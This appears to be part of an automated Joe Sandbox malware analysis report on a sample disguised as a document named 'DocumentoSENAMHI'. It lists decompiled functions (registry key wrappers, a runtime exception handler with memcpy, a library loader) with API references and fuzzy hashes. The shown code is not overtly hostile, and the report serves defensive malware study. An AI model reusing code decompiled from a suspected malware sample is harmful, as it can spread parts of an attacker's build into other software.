    				_t13 = GetModuleHandleA("Advapi32.dll");
    				if(_t13 == 0) {
    					goto L6;
    				}
    				_t14 = GetProcAddress(_t13, "RegCreateKeyTransactedA");
    				if(_t14 == 0) {
    					goto L6;
    				}
    				return  *_t14(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36,  *_t18, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 0015135A
    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 0015136A
    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 001513AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AddressCreateHandleModuleProc
    • String ID: Advapi32.dll$RegCreateKeyTransactedA$Mv@Nv$Nv
    • API String ID: 1964897782-236308291
    • Opcode ID: 3cecdf0abf9d0490ed6dd7be11530901217fe356bc15691bbd3bd513c9f46b42
    • Instruction ID: 38c8f1fb777ad3fce2f025e4be0bbf1027548f4f2ae9b66c8e8f60ba20970dbb
    • Opcode Fuzzy Hash: 3cecdf0abf9d0490ed6dd7be11530901217fe356bc15691bbd3bd513c9f46b42
    • Instruction Fuzzy Hash: E0011231100244FADF320F529C09D977E7DFBCAB627054229FE1994451D771D894EB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E001512E5(intOrPtr* __ecx, void* _a4, char* _a8, int _a16, void** _a20) {
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t18;
    
    				_t18 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegOpenKeyExA(_a4, _a8, 0, _a16, _a20);
    				}
    				_t13 = GetModuleHandleA("Advapi32.dll");
    				if(_t13 == 0) {
    					goto L6;
    				}
    				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedA");
    				if(_t14 == 0) {
    					goto L6;
    				}
    				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001512F7
    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00151307
    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00151337
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AddressHandleModuleOpenProc
    • String ID: Advapi32.dll$RegOpenKeyTransactedA$Mv@Nv$Nv
    • API String ID: 1337834000-2047141036
    • Opcode ID: 64ecb75b3c1fa5dbd3377f39b38cbda0ff1dc969ea43baadd4e21d4bb1865b13
    • Instruction ID: feedde5a84ba8f53a6d6ce73792dd9c9e90b0f0d65c85bcd5368b38cc5774af6
    • Opcode Fuzzy Hash: 64ecb75b3c1fa5dbd3377f39b38cbda0ff1dc969ea43baadd4e21d4bb1865b13
    • Instruction Fuzzy Hash: D7F06232100105FBCF621FA1DC09EAB7F7EFF85762B444029FD6195424D77288A1EB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00151596(void** __ecx, char* _a4) {
    				_Unknown_base(*)()* _t6;
    				struct HINSTANCE__* _t9;
    
    				_t13 = __ecx;
    				_t12 =  *((intOrPtr*)(__ecx + 8));
    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
    					if( *0x292e00 != 0) {
    						_t6 =  *0x292dfc; // 0x0
    					} else {
    						_t9 = GetModuleHandleA("Advapi32.dll");
    						if(_t9 == 0) {
    							_t6 =  *0x292dfc; // 0x0
    						} else {
    							_t6 = GetProcAddress(_t9, "RegDeleteKeyExA");
    							 *0x292dfc = _t6;
    						}
    						 *0x292e00 = 1;
    					}
    					if(_t6 == 0) {
    						return RegDeleteKeyA( *_t13, _a4);
    					} else {
    						return  *_t6( *_t13, _a4, _t13[1], 0);
    					}
    				}
    				return E001513BB(_t12,  *((intOrPtr*)(__ecx)), _a4);
    			}

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,?,0015339A,?), ref: 001515BD
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 001515CD
      • Part of subcall function 001513BB: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 001513CD
      • Part of subcall function 001513BB: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 001513DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: Advapi32.dll$RegDeleteKeyExA$Mv@Nv$Nv
    • API String ID: 1646373207-3533393476
    • Opcode ID: 7a5ce527a980ccc6fe93978b9d45e4500e32443ff07a068399441cbbed4753d4
    • Instruction ID: 251cfa97967e05a64e01f3dba6bbc9a84114045a6675871a623cf7347de97d78
    • Opcode Fuzzy Hash: 7a5ce527a980ccc6fe93978b9d45e4500e32443ff07a068399441cbbed4753d4
    • Instruction Fuzzy Hash: 8101D639114201FFDF128F61EC04B957BA6BB15383F04802BFD6389560DBB29958EB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00155570(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				int _v32;
    				void* _v36;
    				void* _v40;
    				char* __edi;
    				intOrPtr* __esi;
    				int _t150;
    				signed int _t157;
    				intOrPtr _t158;
    				void* _t159;
    				intOrPtr* _t160;
    				intOrPtr _t162;
    				void* _t165;
    				signed int _t167;
    				void _t175;
    				void _t176;
    				int _t178;
    				unsigned int _t179;
    				int _t180;
    				int _t191;
    				intOrPtr* _t195;
    				intOrPtr _t196;
    				signed int _t200;
    				char _t202;
    				int _t206;
    				unsigned int _t207;
    				int _t208;
    				int _t210;
    				int _t215;
    				signed int _t226;
    				unsigned int _t230;
    				int _t231;
    				int _t233;
    				signed int _t239;
    				void* _t240;
    				intOrPtr _t241;
    				void* _t243;
    				signed int _t251;
    				intOrPtr _t258;
    				void* _t260;
    				void* _t263;
    				void* _t264;
    				void* _t265;
    				intOrPtr* _t267;
    				int _t271;
    				void* _t275;
    				void* _t277;
    				void* _t287;
    
    				_t221 = __edx;
    				_t195 = _a4;
    				_push(_t240);
    				_v5 = 0;
    				_v16 = 1;
    				 *_t195 = E001606BB(__ecx,  *_t195);
    				_t196 = _a8;
    				_t6 = _t196 + 0x10; // 0x11
    				_t258 = _t6;
    				_push(_t258);
    				_v20 = _t258;
    				_v12 =  *(_t196 + 8) ^  *0x169008;
    				E00155530(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x169008);
    				E00156C3C(_a12);
    				_t150 = _a4;
    				_t277 = _t275 - 0x1c + 0x10;
    				_t241 =  *((intOrPtr*)(_t196 + 0xc));
    				if(( *(_t150 + 4) & 0x00000066) != 0) {
    					__eflags = _t241 - 0xfffffffe;
    					if(_t241 != 0xfffffffe) {
    						_t221 = 0xfffffffe;
    						E00156DC0(_t196, 0xfffffffe, _t258, 0x169008);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t150;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
    					if(_t241 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t200 = _v12;
    							_t157 = _t241 + (_t241 + 2) * 2;
    							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
    							_t158 = _t200 + _t157 * 4;
    							_t201 =  *((intOrPtr*)(_t158 + 4));
    							_v24 = _t158;
    							if( *((intOrPtr*)(_t158 + 4)) == 0) {
    								_t202 = _v5;
    								goto L7;
    							} else {
    								_t221 = _t258;
    								_t159 = E00156D60(_t201, _t258);
    								_t202 = 1;
    								_v5 = 1;
    								_t287 = _t159;
    								if(_t287 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t258);
    									E00155530(_t196, _t221, _t241, _t258, _v12);
    									goto L14;
    								} else {
    									if(_t287 > 0) {
    										_t160 = _a4;
    										__eflags =  *_t160 - 0xe06d7363;
    										if( *_t160 == 0xe06d7363) {
    											__eflags =  *0x1613e4;
    											if(__eflags != 0) {
    												_t191 = E001600C0(__eflags, 0x1613e4);
    												_t277 = _t277 + 4;
    												__eflags = _t191;
    												if(_t191 != 0) {
    													_t271 =  *0x1613e4; // 0x15536a
    													 *0x161278(_a4, 1);
    													 *_t271();
    													_t258 = _v20;
    													_t277 = _t277 + 8;
    												}
    												_t160 = _a4;
    											}
    										}
    										_t222 = _t160;
    										E00156DA0(_t160, _a8, _t160);
    										_t162 = _a8;
    										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
    										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
    											_t222 = _t241;
    											E00156DC0(_t162, _t241, _t258, 0x169008);
    											_t162 = _a8;
    										}
    										_push(_t258);
    										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
    										E00155530(_t196, _t222, _t241, _t258, _v12);
    										E00156D80();
    										asm("int3");
    										asm("int3");
    										asm("int3");
    										_push(_t241);
    										_push(_t258);
    										_t260 = _v36;
    										_t206 = _v32;
    										_t243 = _v40;
    										_t165 = _t260 + _t206;
    										__eflags = _t243 - _t260;
    										if(_t243 <= _t260) {
    											L25:
    											__eflags = _t206 - 0x20;
    											if(_t206 < 0x20) {
    												L96:
    												_t207 = _t206 & 0x0000001f;
    												__eflags = _t207;
    												if(_t207 != 0) {
    													_t167 = _t207;
    													_t208 = _t207 >> 2;
    													__eflags = _t208;
    													while(_t208 != 0) {
    														 *_t243 =  *_t260;
    														_t243 = _t243 + 4;
    														_t260 = _t260 + 4;
    														_t208 = _t208 - 1;
    														__eflags = _t208;
    													}
    													_t210 = _t167 & 0x00000003;
    													__eflags = _t210;
    													while(_t210 != 0) {
    														 *_t243 =  *_t260;
    														_t260 = _t260 + 1;
    														_t243 = _t243 + 1;
    														_t210 = _t210 - 1;
    														__eflags = _t210;
    													}
    												}
    												goto L102;
    											} else {
    												__eflags = _t206 - 0x80;
    												if(__eflags >= 0) {
    													asm("bt dword [0x292728], 0x1");
    													if(__eflags >= 0) {
    														__eflags = (_t243 ^ _t260) & 0x0000000f;
    														if(__eflags != 0) {
    															L33:
    															asm("bt dword [0x292728], 0x0");
    															if(__eflags >= 0) {
    																goto L58;
    															} else {
    																__eflags = _t243 & 0x00000003;
    																if((_t243 & 0x00000003) != 0) {
    																	goto L58;
    																} else {
    																	__eflags = _t260 & 0x00000003;
    																	if(__eflags == 0) {
    																		asm("bt edi, 0x2");
    																		if(__eflags < 0) {
    																			_t176 =  *_t260;
    																			_t206 = _t206 - 4;
    																			__eflags = _t206;
    																			_t260 = _t260 + 4;
    																			 *_t243 = _t176;
    																			_t243 = _t243 + 4;
    																		}
    																		asm("bt edi, 0x3");
    																		if(__eflags < 0) {
    																			asm("movq xmm1, [esi]");
    																			_t206 = _t206 - 8;
    																			__eflags = _t206;
    																			_t260 = _t260 + 8;
    																			asm("movq [edi], xmm1");
    																			_t243 = _t243 + 8;
    																		}
    																		__eflags = _t260 & 0x00000007;
    																		if(__eflags == 0) {
    																			asm("movdqa xmm1, [esi-0x8]");
    																			_t263 = _t260 - 8;
    																			do {
    																				asm("movdqa xmm3, [esi+0x10]");
    																				_t206 = _t206 - 0x30;
    																				asm("movdqa xmm0, [esi+0x20]");
    																				asm("movdqa xmm5, [esi+0x30]");
    																				_t263 = _t263 + 0x30;
    																				__eflags = _t206 - 0x30;
    																				asm("movdqa xmm2, xmm3");
    																				asm("palignr xmm3, xmm1, 0x8");
    																				asm("movdqa [edi], xmm3");
    																				asm("movdqa xmm4, xmm0");
    																				asm("palignr xmm0, xmm2, 0x8");
    																				asm("movdqa [edi+0x10], xmm0");
    																				asm("movdqa xmm1, xmm5");
    																				asm("palignr xmm5, xmm4, 0x8");
    																				asm("movdqa [edi+0x20], xmm5");
    																				_t243 = _t243 + 0x30;
    																			} while (_t206 >= 0x30);
    																			_t260 = _t263 + 8;
    																		} else {
    																			asm("bt esi, 0x3");
    																			if(__eflags >= 0) {
    																				asm("movdqa xmm1, [esi-0x4]");
    																				_t264 = _t260 - 4;
    																				do {
    																					asm("movdqa xmm3, [esi+0x10]");
    																					_t206 = _t206 - 0x30;
    																					asm("movdqa xmm0, [esi+0x20]");
    																					asm("movdqa xmm5, [esi+0x30]");
    																					_t264 = _t264 + 0x30;
    																					__eflags = _t206 - 0x30;
    																					asm("movdqa xmm2, xmm3");
    																					asm("palignr xmm3, xmm1, 0x4");
    																					asm("movdqa [edi], xmm3");
    																					asm("movdqa xmm4, xmm0");
    																					asm("palignr xmm0, xmm2, 0x4");
    																					asm("movdqa [edi+0x10], xmm0");
    																					asm("movdqa xmm1, xmm5");
    																					asm("palignr xmm5, xmm4, 0x4");
    																					asm("movdqa [edi+0x20], xmm5");
    																					_t243 = _t243 + 0x30;
    																				} while (_t206 >= 0x30);
    																				_t260 = _t264 + 4;
    																				while(1) {
    																					L51:
    																					__eflags = _t206 - 0x10;
    																					if(__eflags < 0) {
    																						break;
    																					}
    																					asm("movdqu xmm1, [esi]");
    																					_t206 = _t206 - 0x10;
    																					_t260 = _t260 + 0x10;
    																					asm("movdqa [edi], xmm1");
    																					_t243 = _t243 + 0x10;
    																				}
    																				asm("bt ecx, 0x2");
    																				if(__eflags < 0) {
    																					_t175 =  *_t260;
    																					_t206 = _t206 - 4;
    																					__eflags = _t206;
    																					_t260 = _t260 + 4;
    																					 *_t243 = _t175;
    																					_t243 = _t243 + 4;
    																				}
    																				asm("bt ecx, 0x3");
    																				if(__eflags < 0) {
    																					asm("movq xmm1, [esi]");
    																					__eflags = _t206;
    																					_t260 = _t260 + 8;
    																					asm("movq [edi], xmm1");
    																					_t243 = _t243 + 8;
    																				}
    																				goto __eax;
    																			}
    																			asm("movdqa xmm1, [esi-0xc]");
    																			_t265 = _t260 - 0xc;
    																			do {
    																				asm("movdqa xmm3, [esi+0x10]");
    																				_t206 = _t206 - 0x30;
    																				asm("movdqa xmm0, [esi+0x20]");
    																				asm("movdqa xmm5, [esi+0x30]");
    																				_t265 = _t265 + 0x30;
    																				__eflags = _t206 - 0x30;
    																				asm("movdqa xmm2, xmm3");
    																				asm("palignr xmm3, xmm1, 0xc");
    																				asm("movdqa [edi], xmm3");
    																				asm("movdqa xmm4, xmm0");
    																				asm("palignr xmm0, xmm2, 0xc");
    																				asm("movdqa [edi+0x10], xmm0");
    																				asm("movdqa xmm1, xmm5");
    																				asm("palignr xmm5, xmm4, 0xc");
    																				asm("movdqa [edi+0x20], xmm5");
    																				_t243 = _t243 + 0x30;
    																			} while (_t206 >= 0x30);
    																			_t260 = _t265 + 0xc;
    																		}
    																		goto L51;
    																	}
    																}
    															}
    															goto L60;
    														} else {
    															asm("bt dword [0x169010], 0x1");
    															if(__eflags < 0) {
    																_t178 = _t260 & 0x0000000f;
    																__eflags = _t178;
    																if(_t178 != 0) {
    																	_push(_t206 - 0x10);
    																	_t179 = 0x10 - _t178;
    																	_t215 = _t179 & 0x00000003;
    																	__eflags = _t215;
    																	while(_t215 != 0) {
    																		 *_t243 =  *_t260;
    																		_t260 = _t260 + 1;
    																		_t243 = _t243 + 1;
    																		_t215 = _t215 - 1;
    																		__eflags = _t215;
    																	}
    																	_t180 = _t179 >> 2;
    																	__eflags = _t180;
    																	while(_t180 != 0) {
    																		 *_t243 =  *_t260;
    																		_t260 = _t260 + 4;
    																		_t243 = _t243 + 4;
    																		_t180 = _t180 - 1;
    																		__eflags = _t180;
    																	}
    																	_pop(_t206);
    																}
    																_t230 = _t206;
    																_t206 = _t206 & 0x0000007f;
    																_t231 = _t230 >> 7;
    																__eflags = _t231;
    																while(_t231 != 0) {
    																	asm("movdqa xmm0, [esi]");
    																	asm("movdqa xmm1, [esi+0x10]");
    																	asm("movdqa xmm2, [esi+0x20]");
    																	asm("movdqa xmm3, [esi+0x30]");
    																	asm("movdqa [edi], xmm0");
    																	asm("movdqa [edi+0x10], xmm1");
    																	asm("movdqa [edi+0x20], xmm2");
    																	asm("movdqa [edi+0x30], xmm3");
    																	asm("movdqa xmm4, [esi+0x40]");
    																	asm("movdqa xmm5, [esi+0x50]");
    																	asm("movdqa xmm6, [esi+0x60]");
    																	asm("movdqa xmm7, [esi+0x70]");
    																	asm("movdqa [edi+0x40], xmm4");
    																	asm("movdqa [edi+0x50], xmm5");
    																	asm("movdqa [edi+0x60], xmm6");
    																	asm("movdqa [edi+0x70], xmm7");
    																	_t260 = _t260 + 0x80;
    																	_t243 = _t243 + 0x80;
    																	_t231 = _t231 - 1;
    																	__eflags = _t231;
    																}
    																goto L92;
    															} else {
    																goto L33;
    															}
    														}
    													} else {
    														memcpy(_t243, _t260, _t206);
    														return _v40;
    													}
    												} else {
    													asm("bt dword [0x169010], 0x1");
    													if(__eflags < 0) {
    														L92:
    														__eflags = _t206;
    														if(_t206 != 0) {
    															_t233 = _t206 >> 5;
    															__eflags = _t233;
    															if(_t233 != 0) {
    																do {
    																	asm("movdqu xmm0, [esi]");
    																	asm("movdqu xmm1, [esi+0x10]");
    																	asm("movdqu [edi], xmm0");
    																	asm("movdqu [edi+0x10], xmm1");
    																	_t260 = _t260 + 0x20;
    																	_t243 = _t243 + 0x20;
    																	_t233 = _t233 - 1;
    																	__eflags = _t233;
    																} while (_t233 != 0);
    															}
    															goto L96;
    														}
    														L102:
    														return _v40;
    													} else {
    														L58:
    														__eflags = _t243 & 0x00000003;
    														while((_t243 & 0x00000003) != 0) {
    															 *_t243 =  *_t260;
    															_t206 = _t206 - 1;
    															_t260 = _t260 + 1;
    															_t243 = _t243 + 1;
    															__eflags = _t243 & 0x00000003;
    														}
    														L60:
    														_t226 = _t206;
    														__eflags = _t206 - 0x20;
    														if(_t206 < 0x20) {
    															goto L96;
    														} else {
    															memcpy(_t243, _t260, _t206 >> 2 << 2);
    															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M00155934))) {
    																case 0:
    																	return _v40;
    																	goto L108;
    																case 1:
    																	 *__edi =  *__esi;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 2:
    																	 *__edi =  *__esi;
    																	_t92 = __esi + 1; // 0xc0330cc4
    																	 *((char*)(__edi + 1)) =  *_t92;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 3:
    																	 *__edi =  *__esi;
    																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
    																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    															}
    														}
    													}
    												}
    											}
    										} else {
    											__eflags = _t243 - _t165;
    											if(_t243 < _t165) {
    												_t267 = _t260 + _t206;
    												_t251 = _t243 + _t206;
    												__eflags = _t206 - 0x20;
    												if(__eflags < 0) {
    													L83:
    													__eflags = _t206 & 0xfffffffc;
    													while((_t206 & 0xfffffffc) != 0) {
    														_t251 = _t251 - 4;
    														_t267 = _t267 - 4;
    														 *_t251 =  *_t267;
    														_t206 = _t206 - 4;
    														__eflags = _t206 & 0xfffffffc;
    													}
    													__eflags = _t206;
    													if(_t206 != 0) {
    														do {
    															_t251 = _t251 - 1;
    															_t267 = _t267 - 1;
    															 *_t251 =  *_t267;
    															_t206 = _t206 - 1;
    															__eflags = _t206;
    														} while (_t206 != 0);
    													}
    													return _v40;
    												} else {
    													asm("bt dword [0x169010], 0x1");
    													if(__eflags < 0) {
    														__eflags = _t251 & 0x0000000f;
    														if((_t251 & 0x0000000f) != 0) {
    															do {
    																_t206 = _t206 - 1;
    																_t267 = _t267 - 1;
    																_t251 = _t251 - 1;
    																 *_t251 =  *_t267;
    																__eflags = _t251 & 0x0000000f;
    															} while ((_t251 & 0x0000000f) != 0);
    															while(1) {
    																L79:
    																__eflags = _t206 - 0x80;
    																if(_t206 < 0x80) {
    																	break;
    																}
    																_t267 = _t267 - 0x80;
    																_t251 = _t251 - 0x80;
    																asm("movdqu xmm0, [esi]");
    																asm("movdqu xmm1, [esi+0x10]");
    																asm("movdqu xmm2, [esi+0x20]");
    																asm("movdqu xmm3, [esi+0x30]");
    																asm("movdqu xmm4, [esi+0x40]");
    																asm("movdqu xmm5, [esi+0x50]");
    																asm("movdqu xmm6, [esi+0x60]");
    																asm("movdqu xmm7, [esi+0x70]");
    																asm("movdqu [edi], xmm0");
    																asm("movdqu [edi+0x10], xmm1");
    																asm("movdqu [edi+0x20], xmm2");
    																asm("movdqu [edi+0x30], xmm3");
    																asm("movdqu [edi+0x40], xmm4");
    																asm("movdqu [edi+0x50], xmm5");
    																asm("movdqu [edi+0x60], xmm6");
    																asm("movdqu [edi+0x70], xmm7");
    																_t206 = _t206 - 0x80;
    																__eflags = _t206 & 0xffffff80;
    																if((_t206 & 0xffffff80) != 0) {
    																	continue;
    																}
    																break;
    															}
    															__eflags = _t206 - 0x20;
    															if(_t206 >= 0x20) {
    																do {
    																	_t267 = _t267 - 0x20;
    																	_t251 = _t251 - 0x20;
    																	asm("movdqu xmm0, [esi]");
    																	asm("movdqu xmm1, [esi+0x10]");
    																	asm("movdqu [edi], xmm0");
    																	asm("movdqu [edi+0x10], xmm1");
    																	_t206 = _t206 - 0x20;
    																	__eflags = _t206 & 0xffffffe0;
    																} while ((_t206 & 0xffffffe0) != 0);
    															}
    															goto L83;
    														}
    														goto L79;
    													} else {
    														__eflags = _t251 & 0x00000003;
    														if((_t251 & 0x00000003) != 0) {
    															_t239 = _t251 & 0x00000003;
    															_t206 = _t206 - _t239;
    															__eflags = _t206;
    															do {
    																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
    																_t267 = _t267 - 1;
    																_t251 = _t251 - 1;
    																_t239 = _t239 - 1;
    																__eflags = _t239;
    															} while (_t239 != 0);
    														}
    														__eflags = _t206 - 0x20;
    														if(_t206 < 0x20) {
    															goto L83;
    														} else {
    															asm("std");
    															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
    															asm("cld");
    															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M001559E0))) {
    																case 0:
    																	return _v40;
    																	goto L108;
    																case 1:
    																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 2:
    																	_t113 = __esi + 3; // 0x33ebc033
    																	 *((char*)(__edi + 3)) =  *_t113;
    																	_t115 = __esi + 2; // 0xebc0330c
    																	 *((char*)(__edi + 2)) =  *_t115;
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    																case 3:
    																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
    																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
    																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
    																	__eax = _v40;
    																	_pop(__esi);
    																	_pop(__edi);
    																	return _v40;
    																	goto L108;
    															}
    														}
    													}
    												}
    											} else {
    												goto L25;
    											}
    										}
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L108;
    							L7:
    							_t241 = _t196;
    						} while (_t196 != 0xfffffffe);
    						if(_t202 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L108:
    			}


    APIs
    • _ValidateLocalCookies.LIBCMT ref: 001555A7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 001555AF
    • _ValidateLocalCookies.LIBCMT ref: 00155638
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00155663
    • _ValidateLocalCookies.LIBCMT ref: 001556B8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: c98ad8319259204d8d1c804af61dc54b252d682d3097350a0c0e5d1922f65a0f
    • Instruction ID: e9476678514f41bf6e5036480f90f5c385c1d02e4a0c5bb076a22674b3b1c6a3
    • Opcode Fuzzy Hash: c98ad8319259204d8d1c804af61dc54b252d682d3097350a0c0e5d1922f65a0f
    • Instruction Fuzzy Hash: 5C41C434A00658EFCF10DF68C894A9EBBB6BF54325F948055EC249F352D731AA19CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001596F7(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0x292b68 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0x162648 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E00158B48(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E00158B48(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}


    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
